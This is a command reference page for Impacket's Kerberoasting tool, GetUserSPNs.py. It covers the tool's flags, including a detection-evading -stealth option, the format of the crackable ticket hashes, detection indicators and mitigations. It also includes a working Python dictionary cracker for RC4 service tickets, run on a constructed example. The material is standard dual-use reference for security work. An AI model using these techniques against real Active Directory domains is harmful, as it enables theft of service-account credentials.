LinuxCommandLibrary

impacket-getuserspns

List user accounts that carry Service Principal Names (SPNs) and request their Kerberos service tickets for offline cracking (Kerberoasting)

TLDR

View documentation for the original command

$ tldr GetUserSPNs.py

SYNOPSIS

impacket-getuserspns [-h] [-target-domain TARGET_DOMAIN] [-no-preauth ACCOUNT] [-stealth] [-usersfile USERSFILE] [-request] [-request-user USERNAME] [-save] [-outputfile FILE] [-debug] [-ts] [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key] [-dc-ip IP] [-dc-host HOSTNAME] domain/username[:password]

PARAMETERS

target
    Positional argument in the format domain/username[:password]. The domain part is mandatory; unless -dc-ip or -dc-host is given it is also resolved to find the Domain Controller. If no password is supplied and none of -hashes, -aesKey, -k or -no-pass is present, the script prompts for one.

-h, --help
    Displays the help message and exits.

-debug
    Turns on debug output for more detailed information.

-ts
    Adds a timestamp to every log message, useful for chronological analysis.

-target-domain TARGET_DOMAIN
    Domain to query and request tickets from when it differs from the authenticating user's domain. Allows Kerberoasting across trusts; when set, -dc-ip is ignored.

-no-preauth ACCOUNT
    Name of an account that has Kerberos pre-authentication disabled. Service tickets are then obtained through AS-REQ on behalf of that account, so no valid password is needed at all; the accounts to target are read from -usersfile.

-stealth
    Drops the (servicePrincipalName=*) clause from the LDAP filter so the query does not match that common detection signature. The DC then returns every enabled user object, which can cause huge memory consumption or errors on large domains.

-usersfile USERSFILE
    File with one sAMAccountName per line. Tickets are requested only for those accounts instead of for every SPN returned by LDAP.

-request
    Requests a TGS for every discovered SPN and prints the result in John the Ripper/Hashcat format. Without this flag (or -request-user/-save) the script only lists SPNs, their owning accounts, group membership, PasswordLastSet, LastLogon and delegation settings.

-request-user USERNAME
    Requests a TGS only for the SPN(s) of the given account (just the sAMAccountName, no domain).

-save
    Saves every requested TGS to disk as <username>.ccache. Implies -request.

-outputfile FILE
    Writes the extracted ticket material to FILE in John the Ripper/Hashcat format instead of standard output.

-hashes LMHASH:NTHASH
    Authenticates with NTLM hashes. If the LM hash is not available, leave it blank (e.g., :NTHASH).

-no-pass
    Do not prompt for a password. Useful with Kerberos authentication (-k) when a ccache is available.

-k
    Uses Kerberos authentication. Credentials are taken from the ccache file named by the KRB5CCNAME environment variable, matched against the target parameters; if no usable credentials are found there, the ones given on the command line are used.

-aesKey hex key
    AES key (128 or 256 bits, hexadecimal) to use for Kerberos authentication.

-dc-ip IP
    IP address of the Domain Controller. If omitted, the domain part (FQDN) of the target parameter is resolved instead. Ignored when -target-domain is specified.

-dc-host HOSTNAME
    Hostname of the Domain Controller to use. If omitted, the domain part of the target parameter is used.

DESCRIPTION

impacket-getuserspns (GetUserSPNs.py) is the Impacket script that performs Kerberoasting against Microsoft Active Directory. It binds to the Domain Controller over LDAP with ordinary domain credentials, queries for enabled, non-computer user objects that carry a servicePrincipalName, and lists each SPN with its owning account, group membership, PasswordLastSet, LastLogon and delegation settings. With -request (or -request-user/-save) it then uses the legitimate Kerberos TGS exchange to obtain a service ticket for each SPN.

The encrypted part of a service ticket is protected with a key derived from the service account's password: for RC4-HMAC (etype 23) that key is the account's NT hash itself, for AES (etypes 17 and 18) it is a PBKDF2-derived key. The script does not recover a hash from the ticket; it reformats the ticket's encrypted part into a line that Hashcat and John the Ripper can test candidate passwords against offline, and writes it to standard output or to -outputfile.

The attack is effective because any authenticated principal, however low-privileged, may request a ticket for any SPN without touching the service host or holding any elevated right on a Domain Controller. The only thing standing between the ticket and the plaintext password is the strength of the service account's password, and service accounts are commonly given weak, old or reused passwords.

CAVEATS

  • Requires valid domain credentials (even low-privileged) for the LDAP query and the TGS requests, unless -no-preauth can be used with an account that has Kerberos pre-authentication disabled.
  • Generates LDAP and Kerberos traffic that network monitoring and the Domain Controller's own logs record: the (servicePrincipalName=*) LDAP filter and a burst of event 4769 entries with RC4 (0x17) encryption from one client are well-known indicators.
  • Repeatedly supplying wrong credentials for the authenticating account counts against that account's lockout threshold. The targeted service accounts are never authenticated against, so -request-user cannot lock them out.
  • Only targets SPNs on user accounts; computer objects and disabled accounts are excluded by the LDAP filter, because machine passwords are long, random and rotated automatically, which makes them impractical to crack.
  • Offline cracking of the extracted tickets can be computationally intensive and time-consuming, depending on password complexity, the encryption type (AES tickets are far slower per guess because the key is derived with PBKDF2) and available cracking resources.

KERBEROASTING ATTACK

Kerberoasting extracts password-cracking material from Kerberos service tickets (the ticket carried in the TGS-REP). Any authenticated domain principal can request a service ticket for any registered SPN; the KDC issues it without checking whether the requester is entitled to use the service, because access control is the service's job. The ticket's enc-part is encrypted with the long-term key of the account that owns the SPN. When that account is a user account, the key is derived from a human-chosen password (the NT hash for RC4-HMAC, a PBKDF2 derivation for AES), so the attacker can take the ciphertext offline and test candidate passwords until one decrypts the ticket and verifies its integrity checksum. No failed logons are produced and nothing ever touches the service itself.

OUTPUT FORMAT

With -request the script prints one line per ticket in the format Hashcat and John the Ripper consume directly. For an RC4-HMAC ticket (etype 23) the line is $krb5tgs$23$*user$REALM$spn*$checksum$edata2, where checksum is the first 16 bytes of the enc-part (the HMAC-MD5 over the plaintext) in hex, edata2 is the remaining RC4 ciphertext in hex, and colons in the SPN are replaced by '~'. AES tickets are written as $krb5tgs$17$user$REALM$*spn*$checksum$edata2 (AES128) or $krb5tgs$18$user$REALM$*spn*$checksum$edata2 (AES256), with the 12-byte HMAC-SHA1-96 tag as the checksum. The matching Hashcat modes are 13100 (etype 23), 19600 (etype 17) and 19700 (etype 18); John the Ripper's krb5tgs format handles the etype-23 lines.
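The ticket format and the offline attack described above, as an added worked example that is not from this page or from Impacket: it builds an RC4-HMAC enc-part from a made-up service-account password with the RFC 4757 construction (key usage 2, the one used for the ticket in a TGS-REP), emits it in the $krb5tgs$23$ layout GetUserSPNs.py uses, parses that line back, and recovers the password by dictionary attack the way Hashcat mode 13100 does. The account name, realm, SPN, wordlist and ticket plaintext are constructed; MD4 is implemented inline because hashlib's md4 is often unavailable under OpenSSL 3.

```python
import hashlib
import hmac
import os
import struct

KEY_USAGE_TICKET = 2  # RFC 4120 key usage for the ticket enc-part in a TGS-REP (service key)
HASHCAT_MODES = {23: 13100, 17: 19600, 18: 19700}  # Kerberos 5 TGS-REP modes by etype


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python; hashlib.new('md4') needs OpenSSL's legacy provider."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda v, n: (((v & 0xFFFFFFFF) << n) | ((v & 0xFFFFFFFF) >> (32 - n))) & 0xFFFFFFFF
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64) + struct.pack("<Q", len(data) * 8)
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    order3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for i in range(16):  # round 1
            a, b, c, d = d, rotl(a + f(b, c, d) + x[i], (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):  # round 2
            a, b, c, d = d, rotl(a + g(b, c, d) + x[(i % 4) * 4 + i // 4] + 0x5A827999, (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):  # round 3
            a, b, c, d = d, rotl(a + h(b, c, d) + x[order3[i]] + 0x6ED9EBA1, (3, 9, 11, 15)[i % 4]), b, c
        a0, b0, c0, d0 = [(s + t) & 0xFFFFFFFF for s, t in ((a0, a), (b0, b), (c0, c), (d0, d))]
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password)); it is also the RC4-HMAC Kerberos long-term key."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, plaintext: bytes, confounder: bytes) -> bytes:
    """RFC 4757: K1 = HMAC-MD5(K, usage); cksum = HMAC-MD5(K1, conf||data);
    K3 = HMAC-MD5(K1, cksum); enc-part = cksum || RC4(K3, conf||data)."""
    k1 = hmac.new(key, struct.pack("<I", KEY_USAGE_TICKET), hashlib.md5).digest()
    body = confounder + plaintext
    cksum = hmac.new(k1, body, hashlib.md5).digest()
    k3 = hmac.new(k1, cksum, hashlib.md5).digest()
    return cksum + rc4(k3, body)


def make_krb5tgs_line(user: str, realm: str, spn: str, enc_part: bytes) -> str:
    """The etype-23 layout GetUserSPNs.py prints: 16-byte checksum first, then the ciphertext."""
    return "$krb5tgs$23$*%s$%s$%s*$%s$%s" % (
        user, realm, spn.replace(":", "~"), enc_part[:16].hex(), enc_part[16:].hex())


def parse_krb5tgs_line(line: str) -> dict:
    """Split a $krb5tgs$ line (etype 23, 17 or 18 layout) and pick the Hashcat mode."""
    parts = line.split("$")
    etype = int(parts[2])
    user, realm, spn = parts[3].strip("*"), parts[4], parts[5].strip("*")
    return {"etype": etype, "hashcat_mode": HASHCAT_MODES[etype], "user": user, "realm": realm,
            "spn": spn.replace("~", ":"), "checksum": parts[6], "edata2": parts[7]}


def crack_krb5tgs(line: str, wordlist):
    """Dictionary attack on an etype-23 line: derive the key from each candidate, decrypt
    edata2 under K3 and accept the candidate whose plaintext re-checksums correctly."""
    fields = parse_krb5tgs_line(line)
    if fields["etype"] != 23:
        raise ValueError("AES lines need PBKDF2 key derivation, not shown here")
    cksum, edata2 = bytes.fromhex(fields["checksum"]), bytes.fromhex(fields["edata2"])
    usage = struct.pack("<I", KEY_USAGE_TICKET)
    for candidate in wordlist:
        k1 = hmac.new(nt_hash(candidate), usage, hashlib.md5).digest()
        k3 = hmac.new(k1, cksum, hashlib.md5).digest()
        if hmac.compare_digest(hmac.new(k1, rc4(k3, edata2), hashlib.md5).digest(), cksum):
            return candidate
    return None


def demo():
    """Constructed end-to-end run: a fake ticket for svc_sql, then the offline crack."""
    service_password = "Summer2019!"  # the weak password the attack recovers
    plaintext = b"\x63\x82\x01\x20 constructed EncTicketPart bytes, not real ASN.1"
    enc_part = rc4_hmac_encrypt(nt_hash(service_password), plaintext, os.urandom(8))
    line = make_krb5tgs_line("svc_sql", "CORP.LOCAL", "MSSQLSvc/sql01.corp.local:1433", enc_part)
    wordlist = ["Password1", "Welcome1", "Summer2018!", "Summer2019!", "Winter2020!"]
    return line, crack_krb5tgs(line, wordlist)


if __name__ == "__main__":
    print("%s\nrecovered: %s" % demo())
```

Every guess costs one MD4, three HMAC-MD5s and one RC4 pass, which is why RC4 tickets fall to GPU wordlists so quickly; an AES ticket would replace nt_hash() with a 4096-iteration PBKDF2 and a different checksum, so only the key-derivation step changes, not the attack.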

MITIGATION STRATEGIES

To defend against Kerberoasting, organizations should:

  • Enforce long, random passwords (25 or more characters) for every user account that carries an SPN; the script's listing shows PasswordLastSet, so stale service passwords are the first thing an attacker will target.
  • Regularly rotate service account passwords.
  • Prefer Group Managed Service Accounts (gMSAs) or standalone Managed Service Accounts (MSAs), whose 240-byte passwords are generated and rotated automatically and are not crackable in practice.
  • Restrict service accounts to AES via msDS-SupportedEncryptionTypes so that no RC4 (etype 23) ticket is issued for them; AES tickets crack far more slowly, and an RC4 request for such an account becomes a detection signal in itself.
  • Monitor event 4769 on Domain Controllers for anomalous TGS requests: many distinct service accounts requested by one user or client address in a short window, RC4 tickets for accounts that are normally issued AES, and any ticket for a honeypot account whose SPN is never used legitimately.
  • Do not leave 'Do not require Kerberos preauthentication' enabled on any account unless a legacy service needs it; such an account permits AS-REP roasting and, through -no-preauth, lets an attacker with no credentials at all perform Kerberoasting.

HISTORY

impacket-getuserspns is the packaged name of GetUserSPNs.py from Impacket, the Python collection of network-protocol implementations and example tools originally developed at CORE Security, later maintained by SecureAuth and now by Fortra. Kerberoasting was introduced by Tim Medin at DerbyCon 2014 ("Attacking Kerberos: Kicking the Guard Dog of Hades") together with the first extraction and cracking tooling; Will Schroeder (harmj0y) and others later popularized it through PowerView and Rubeus, and Impacket's script made the technique available from a non-Windows host using nothing but domain credentials. Its continued development (cross-trust targeting, the -no-preauth path, AES ticket output) tracks the ongoing evolution of attacks against Active Directory service accounts.

SEE ALSO

impacket-getnpusers, hashcat, john, setspn.exe (Windows)
